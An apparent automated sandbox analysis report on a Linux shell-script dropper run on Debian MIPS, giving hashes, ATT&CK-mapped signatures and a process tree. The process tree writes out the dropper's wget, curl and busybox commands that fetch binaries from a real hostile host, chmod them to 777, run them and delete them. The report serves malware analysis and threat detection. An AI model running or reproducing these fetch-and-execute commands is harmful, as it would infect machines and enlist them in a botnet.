Analysis

  • max time kernel
    149s
  • max time network
    31s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    18/10/2024, 02:06

General

  • Target

    840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh

  • Size

    10KB

  • MD5

    f6e271e4d94f1fe16e461104ef8f736a

  • SHA1

    dc7560e563611fd68f908f9baad26d7487947976

  • SHA256

    840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da

  • SHA512

    4435d20a9257c676d12aecdcca5eee355e04974d3429277c941b97658f8cefb32bc6b77fa47934d12ff9dc7d5457e3ab6a4ae80e4b7fa206d9ac58a61c02b084

  • SSDEEP

    192:so4QVCOCkSMFkqcTZx45O4QVCOoZx4MF1:sFkJFkqcTZx4RZx4MF1

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 11 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
    /tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
    1⤵
      PID:719
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:723
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          2⤵
          • System Network Configuration Discovery
          PID:725
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:742
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          2⤵
          • System Network Configuration Discovery
          PID:749
        • /bin/chmod
          chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          2⤵
          • File and Directory Permissions Modification
          PID:790
        • /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          ./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          2⤵
          • Executes dropped EXE
          PID:791
        • /bin/rm
          rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
          2⤵
            PID:795
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            2⤵
            • System Network Configuration Discovery
            PID:796
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:799
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            2⤵
            • System Network Configuration Discovery
            PID:801
          • /bin/chmod
            chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            2⤵
            • File and Directory Permissions Modification
            PID:832
          • /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            ./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            2⤵
            • Executes dropped EXE
            PID:833
          • /bin/rm
            rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            2⤵
              PID:834
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              2⤵
              • System Network Configuration Discovery
              PID:835
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:836
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              2⤵
              • System Network Configuration Discovery
              PID:838
            • /bin/chmod
              chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              2⤵
              • File and Directory Permissions Modification
              PID:839
            • /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              ./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              2⤵
              • Executes dropped EXE
              PID:840
            • /bin/rm
              rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
              2⤵
                PID:841
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
                2⤵
                • System Network Configuration Discovery
                PID:842
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
                2⤵
                • Reads runtime system information
                • System Network Configuration Discovery
                PID:843

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

                    Filesize

                    153B

                    MD5

                    998368d7c95ea4293237f2320546e440

                    SHA1

                    30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

                    SHA256

                    533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

                    SHA512

                    648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97